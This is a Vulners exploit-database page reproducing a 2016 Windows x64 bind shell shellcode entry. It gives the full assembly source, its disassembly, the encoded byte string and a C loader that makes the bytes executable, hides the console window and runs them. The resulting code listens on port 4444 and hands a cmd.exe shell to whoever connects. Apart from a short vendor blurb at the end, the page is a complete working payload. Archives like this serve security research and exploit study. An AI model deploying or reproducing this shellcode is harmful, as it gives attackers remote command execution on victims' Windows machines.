Vulners
Lucene search
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/*
# Title : Windows x64 Bind Shell TCP Shellcode
# size : 508 bytes
# Date : 08-12-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x64
*/
/*
section .text
global _start
_start:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov r14,[rsi+0x30]
;----------------------
mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14
;--------------------------
mov esi,[rbx+0x1c]
add rsi,r14 ;kernel32.dll base address
;-------------------------------
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()
;-------------------------------
mov dl,128
sub rsp,rdx
lea r12,[rsp]
;----------------------------------------------------
;loading ws2_32.dll
xor rdx,rdx
mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl
lea rcx,[r12]
sub rsp,88
call rbx
mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15
mov edi,[rbx+0x1c]
add rdi,r15
;------------------------------
mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()
;-----------------------------------
;WSAStartup(514,&WSADATA)
xor rcx,rcx
mov cx,408
sub rsp,rcx
lea rdx,[rsp]
mov cx,514
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()
;WSASocket(2,1,6,0,0,0)
push 6
push 1
push 2
pop rcx
pop rdx
pop r8
xor r9,r9
mov [rsp+32],r9
mov [rsp+40],r9
call rbx
mov r13,rax ;SOCKET
;--------------------------------------------
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()
;setsockopt(SOCKET,0xffff,4,&1,4)
xor rdx,rdx
mov rcx,r13
mov dx,0xffff
push 4
pop r8
mov [rsp],byte 1
lea r9,[rsp]
sub rsp,88
mov [rsp+32],r8
call rbx
;--------------------------------------------------
mov ebx,[rdi+4]
add rbx,r15 ;bind()
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
push 16
pop r8
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]
mov rcx,r13
call rbx
;----------------------------------------
mov ebx,[rdi+48]
add rbx,r15 ;listen()
;listen(SOCKET,1)
push 1
pop rdx
push r13
pop rcx
call rbx
;-----------------------------------
mov ebx,[rdi]
add rbx,r15 ;accept()
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,16
push rdx
lea r8,[rsp]
lea rdx,[r12]
mov rcx,r13
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax
;--------------------------------------------------
mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl
;-----------------------------------------
sub rsp,88
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
lea rdx,[r12-4] ;"cmd"
xor r8,r8 ;NULL
push r8
pop r9 ;NULL
mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL
lea rax,[r12]
mov [rsp+64],rax
lea rax,[r12+104]
mov [rsp+72],rax
xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()
call rbx
;-----------------------------------------------
mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14
push 1
pop rcx
add rsp,88
call rbx
*/
/*
file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
19: b2 88 mov $0x88,%dl
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
1f: 4c 01 f3 add %r14,%rbx
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
25: 4c 01 f3 add %r14,%rbx
28: 8b 73 1c mov 0x1c(%rbx),%esi
2b: 4c 01 f6 add %r14,%rsi
2e: 66 ba 40 03 mov $0x340,%dx
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
35: 4c 01 f3 add %r14,%rbx
38: b2 80 mov $0x80,%dl
3a: 48 29 d4 sub %rdx,%rsp
3d: 4c 8d 24 24 lea (%rsp),%r12
41: 48 31 d2 xor %rdx,%rdx
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
4b: 5f
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
53: 32
54: 41 88 54 24 06 mov %dl,0x6(%r12)
59: 49 8d 0c 24 lea (%r12),%rcx
5d: 48 83 ec 58 sub $0x58,%rsp
61: ff d3 callq *%rbx
63: 49 89 c7 mov %rax,%r15
66: 48 31 d2 xor %rdx,%rdx
69: b2 88 mov $0x88,%dl
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6f: 4c 01 fb add %r15,%rbx
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
75: 4c 01 fb add %r15,%rbx
78: 8b 7b 1c mov 0x1c(%rbx),%edi
7b: 4c 01 ff add %r15,%rdi
7e: 66 ba c8 01 mov $0x1c8,%dx
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
85: 4c 01 fb add %r15,%rbx
88: 48 31 c9 xor %rcx,%rcx
8b: 66 b9 98 01 mov $0x198,%cx
8f: 48 29 cc sub %rcx,%rsp
92: 48 8d 14 24 lea (%rsp),%rdx
96: 66 b9 02 02 mov $0x202,%cx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: ff d3 callq *%rbx
a0: 48 31 d2 xor %rdx,%rdx
a3: 66 ba 88 01 mov $0x188,%dx
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
aa: 4c 01 fb add %r15,%rbx
ad: 6a 06 pushq $0x6
af: 6a 01 pushq $0x1
b1: 6a 02 pushq $0x2
b3: 59 pop %rcx
b4: 5a pop %rdx
b5: 41 58 pop %r8
b7: 4d 31 c9 xor %r9,%r9
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c4: ff d3 callq *%rbx
c6: 49 89 c5 mov %rax,%r13
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
cc: 4c 01 fb add %r15,%rbx
cf: 48 31 d2 xor %rdx,%rdx
d2: 4c 89 e9 mov %r13,%rcx
d5: 66 ba ff ff mov $0xffff,%dx
d9: 6a 04 pushq $0x4
db: 41 58 pop %r8
dd: c6 04 24 01 movb $0x1,(%rsp)
e1: 4c 8d 0c 24 lea (%rsp),%r9
e5: 48 83 ec 58 sub $0x58,%rsp
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
ee: ff d3 callq *%rbx
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
f3: 4c 01 fb add %r15,%rbx
f6: 6a 10 pushq $0x10
f8: 41 58 pop %r8
fa: 48 31 d2 xor %rdx,%rdx
fd: 49 89 14 24 mov %rdx,(%r12)
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
106: 41 c6 04 24 02 movb $0x2,(%r12)
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
112: 5c
113: 49 8d 14 24 lea (%r12),%rdx
117: 4c 89 e9 mov %r13,%rcx
11a: ff d3 callq *%rbx
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
11f: 4c 01 fb add %r15,%rbx
122: 6a 01 pushq $0x1
124: 5a pop %rdx
125: 41 55 push %r13
127: 59 pop %rcx
128: ff d3 callq *%rbx
12a: 8b 1f mov (%rdi),%ebx
12c: 4c 01 fb add %r15,%rbx
12f: 48 31 d2 xor %rdx,%rdx
132: 49 89 14 24 mov %rdx,(%r12)
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
13b: b2 10 mov $0x10,%dl
13d: 52 push %rdx
13e: 4c 8d 04 24 lea (%rsp),%r8
142: 49 8d 14 24 lea (%r12),%rdx
146: 4c 89 e9 mov %r13,%rcx
149: 48 83 ec 58 sub $0x58,%rsp
14d: ff d3 callq *%rbx
14f: 48 31 d2 xor %rdx,%rdx
152: 49 89 14 24 mov %rdx,(%r12)
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
15b: b2 68 mov $0x68,%dl
15d: 48 31 c9 xor %rcx,%rcx
160: 41 89 14 24 mov %edx,(%r12)
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
178: b2 ff mov $0xff,%dl
17a: 48 ff c2 inc %rdx
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
182: 49 89 44 24 50 mov %rax,0x50(%r12)
187: 49 89 44 24 58 mov %rax,0x58(%r12)
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
198: 64 41
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
19f: 48 83 ec 58 sub $0x58,%rsp
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
1a8: 4d 31 c0 xor %r8,%r8
1ab: 41 50 push %r8
1ad: 41 59 pop %r9
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
1c3: 49 8d 04 24 lea (%r12),%rax
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
1d6: 4d 31 d2 xor %r10,%r10
1d9: 66 41 ba 94 02 mov $0x294,%r10w
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1e2: 4c 01 f3 add %r14,%rbx
1e5: ff d3 callq *%rbx
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1f0: 4c 01 f3 add %r14,%rbx
1f3: 6a 01 pushq $0x1
1f5: 59 pop %rcx
1f6: 48 83 c4 58 add $0x58,%rsp
1fa: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6a\x01\x59\x48\x83\xc4\x58\xff\xd3";
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
//making memory executbale
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
//hiding windows
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
//
(* (int(*)()) shellcode)();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2016 00:00Current